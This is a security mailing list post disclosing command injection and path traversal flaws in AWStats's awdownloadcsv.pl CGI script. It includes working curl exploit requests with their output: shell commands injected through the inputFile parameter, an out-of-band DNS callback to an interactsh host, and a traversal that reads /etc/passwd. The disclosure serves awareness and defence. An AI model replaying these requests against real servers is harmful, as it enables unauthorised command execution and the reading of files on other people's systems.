oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

AWStats awdownloadcsv.pl command injection and path traversal vulnerabilities

From: "christopher.downs" <christopher.downs () vadersecurity com>
Date: Sun, 08 Mar 2026 08:26:23 +0000
Evening,
Two vulnerabilities were identified in the AWStats CGI script awdownloadcsv.pl that may allow command injection and 
arbitrary file access.

Repository:
https://github.com/eldy/AWStats/tree/develop

Examples shown below are running locally in a Docker container for demonstration. 

Download functionality is disabled. The Default. 
my $ALLOWDOWNLOAD=0

#!/usr/bin/perl -w#------------------------------------------------------------------------------
# Free addition to AWStats Web Log Analyzer. Used to export the contents of
# sections of the Apache server log database to CSV for use in other tools.
# Works from command line or as a CGI.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#------------------------------------------------------------------------------
use CGI qw(:standard);

my $ALLOWDOWNLOAD=0;
----- SNIP -----

Issue 1: Command Injection

The "section" parameter appears to be incorporated into shell commands without proper sanitization. Injection of shell 
metacharacters such as "|" may allow an attacker to escape the intended command pipeline. 

Example request(s):

vectorium-x[main] % curl -q --path-as-is 
'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=&inputFile=|id&outputFile=/tmp/j.csv'uid=33(www-data) 
gid=33(www-data) groups=33(www-data)
vectorium-x[main] %

vectorium-x[main*] % curl -q --path-as-is 
'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=&inputFile=|getent%20hosts%20d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun&outputFile=/tmp/j.csv'

206.189.156.69  d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun
vectorium-x[main*] %

/tmp % interactsh-client -dns-only -o /tmp/interact_$(date +%s).interact
    _       __                       __       __
   (_)___  / /____  _________ ______/ /______/ /_
  / / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
 / / / / / /_/  __/ /  / /_/ / /__/ /_(__  ) / / /
/_/_/ /_/\__/\___/_/   \__,_/\___/\__/____/_/ /_/

projectdiscovery.io

[INF] Current interactsh version 1.3.0 (latest)
[INF] Listing 1 payload for OOB Testing
[INF] d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o.oast.fun
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (AAAA) from 66.185.115.247 at 2026-03-08 07:02:25
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (AAAA) from 66.185.115.247 at 2026-03-08 07:02:25
[d6mhta6p9lkdgas4c2r0ujhuo3iyb8n4o] Received DNS interaction (A) from 66.185.115.247 at 2026-03-08 07:02:25

Issue 2: Path Traversal / Arbitrary File Read

The "inputFile" parameter is used directly in file operations without validation, allowing directory traversal.

Example code pattern:

if ($q->param("inputFile")) {
if ($inputFile eq '') { $inputFile = $q->param("inputFile"); }
}

open (IN, $inputFile) || die "cannot open $inputFile\n";

Example request:

vectorium-x[main] % curl -q --path-as-is 
'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=|root&inputFile=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&outputFile=/tmp/pwnd.csv'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing,List,Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
vectorium-x[main] %

/tmp/pwnd.csv written to disk:
vectorium-x[main] % curl -q --path-as-is 
'http://127.0.0.1:8888/awstats/awdownloadcsv.pl?section=|root&inputFile=|cat%20/tmp/pwnd.csv&outputFile='daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
----- SNIP -----

Impact

Depending on deployment configuration, these issues may allow:

-   command execution
    

-   reading arbitrary files
    

-   writing attacker-controlled output files
    


Disclosure

The upstream developer was contacted previously regarding these issues. No response was received, so this notice is 
being sent to the oss-security list for awareness.

August 30th 2025
September 6th 2025

Thanks All --


Sent with Proton Mail secure email.

Attachment: publickey - christopher.downs@vadersecurity.com - 0x9776492D.asc
Description:

Attachment: signature.asc
Description: OpenPGP digital signature

Previous By Date Next
Previous By Thread Next

Current thread: